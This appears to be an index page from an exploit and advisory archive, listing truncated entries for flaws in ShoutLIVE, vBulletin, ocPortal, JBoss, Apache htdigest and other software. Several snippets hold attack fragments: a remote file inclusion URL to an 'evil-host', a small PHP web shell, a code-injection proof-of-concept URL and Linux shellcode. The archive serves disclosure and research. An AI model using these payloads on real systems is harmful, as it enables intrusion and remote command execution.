ShoutLIVE <= 1.1.0 (savesettings.php) Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl ShoutLIVE = 1.1.0 Remote Php Code Execution Based on: http://www.frsirt.com/bulletins/4109 Credits: Coded by DarkFig Website: http://disarm.free.fr/bohard/ Greetz: All AcidRoot/Bod members = use IO::Socket; use LWP::Simple; if!$ARGV1headers; print...

dotProject-2.0.1.txt

dotproject Date: Feb. 14 2006 Vendor: dotproject.net contacted Description: dotProject is a volunteer supported Project Management application. Details: The 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter. Some user-supplied input is not checked...

QNX Neutrino 6.2.1 (phfont) Race Condition Local Root Exploit

Exploit for QNX platform in category local exploits ============================================================= QNX Neutrino 6.2.1 phfont Race Condition Local Root Exploit ============================================================= !/bin/sh email protected 18/10/2003 $ cksum...

Elm < 2.5.8 (Expires Header) Remote Buffer Overflow Exploit

No description provided by source. / Exploit code for the bug posted by Ulf Harnhammar metaurtelia.com http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0688.html Probably you will need to change SYSLOC and STRLOC to work on your box / include stdio.h include stdlib.h include string.h...

OS2A-1001.txt

OS2A ePing Arbitrary File Creation/Command Execution Vulnerability OS2A ID: OS2A1001 Status Published: 08/04/2005 Updated : 08/05/2005 Patch Released Class: File Creation/Command Execution Severity: CRITICAL Overview: ePing is a ping utility plugin for e107, a PHP-based content management system...

nbSMTP 0.99 - 'util.c' Client-Side Command Execution

/ nbSMTPfsexp.c nbSMTP v0.99 remote format string exploit by CoKi root@nosystem:/home/coki/audi ./nbSMTPfsexp nbSMTP v0.99 remote format string exploit by CoKi Use: ./nbSMTPfsexp options options: -t type of target system -r return address -s shellcode address -o offset -l targets list...

DMA-2005-0712b.txt

DMA2005-0712b - 'Nokia Affix Bluetooth btsrv/btobex poor use of system' Author: Kevin Finisterre Vendor: http://www-nrc.nokia.com/affix/, http://affix.sourceforge.net Product: 'affix' References: http://www.digitalmunition.com/DMA2005-0712b.txt Description: Affix is a Bluetooth Protocol Stack for...

Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1)

// source: https://www.securityfocus.com/bid/13537/info A buffer overflow vulnerability exists in the htdigest utility included with Apache. The vulnerability is due to improper bounds checking when copying user-supplied realm data into local buffers. By supplying an overly long realm value to th...

Trillian Basic 3.0 - .png Image Processing Buffer Overflow

Trillian Basic 3.0 - .png Image Processing Buffer Overflow See-security Technologies ltd. http://www.see-security.com Trillian 3.0 PNG Image Processing Buffer overflow Exploit Discovered and coded by: Tal zeltzer import sys import struct Addresses are compatible with Windows XP Service Pack 1...

vBulletin 3.0.6 - PHP Code Injection

Tested on vBulletin Version 3.0.1 /str0ke http://www.xxx.net/misc.php?do=page&template=$systemid SCAN Associates Security Advisory http://www.scan-associates.net Proof of concept ================ http://site.com/misc.php?do=page&template=$phpinfo milw0rm.com 2005-02-22...

ocPortal 1.0.3 Remote File Inclusion

No description provided by source. http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. ?php $com = $GET"com"; system "$com"; ? Example of funcs.php if your host support php. ?php echo...

linux/x86 execve /bin/sh 29 bytes

No description provided by source. / c1999-2003 Shellcode Research http://www.shellcode.com.ar execve/bin/sh for linux x86 29 bytes by Matias Sedalo xorl %ebx, %ebx pushl %ebx leal 0x17%ebx,%eax int $0x80 cdq pushl $0x68732f6e pushl $0x69622f2f movl %esp, %ebx pushl %eax pushl %ebx movl %esp, %ec...

RHEL 2.1 : krb5 (RHSA-2003:021)

Updated packages fix a vulnerability found in the Kerberos FTP client distributed with the Red Hat Linux Advanced Server krb5 packages. Updated 06 Feb 2003 Added fixed packages for Advanced Workstation 2.1. For Advanced Workstation 2.1 these packages also fix CVE-2002-1235 as described in...

CVE-2004-0047

Multiple programs in trr19 1.0 do not properly drop privileges before executing a system command, which could allow local users to gain privileges...

netobserve.txt

NetObserve Security Bypass Vulnerability Credit: Author : Peter Winter-Smith Software: Packages : NetObserve Version : 2.0 and prior Vendor : ExploreAnywhere Software Vendor Url : http://www.exploreanywhere.com/no-intro.php Vulnerability: Bug Type : Security Bypass Severity : Highly Critical +...

JBoss 3.0.8/3.2.1 - HSQLDB Remote Command Injection

source: https://www.securityfocus.com/bid/8773/info A remote command-injection vulnerability has been reported in JBoss. The issue is reportedly exposed via the HSQLDB component, which is a SQL database server that manages JMS connections. Because of a number of flaws, an attacker can pass comman...

S8Forum 3.0 - Remote Command Execution

source: https://www.securityfocus.com/bid/6547/info S8Forum is prone to a remote command execution vulnerability. When a user registers with the forum, a file is created locally with the specified username. The contents of this file will be the data entered by the user. As a result, a malicious...

PHP-Nuke allows Command Execution & Much more

Hi All! I've found a serious security flaw in PHP-Nuke. It allows user to execute any PHP code. The flaw is in the index.php's include file feature. It allows including files like index.php?file=file It prevents users including ..'s in URL's, but it didn't prevent users from entering http://-urls...

security alert: speechd from speechio.org

this is my first post in this kin of thing so bare with me. there is a vulnerability in speechd that alllows you to run arbetrary code as the root user or whoever is running speechd hopefully not root!. it will only work if you are using rsynth, that is all i have tested, it may work on festival...

bug

Hi, I'm reposting a bug I've found some time before. Thanks WebStore from www.cgicentral.net is a shopping cart allowing users to buy things on-line. One of the scripts in the package, wsmail.cgi unsafely passes user-submitted data to 'system' command: if $in'terminate' eval system"kill $in'kill'...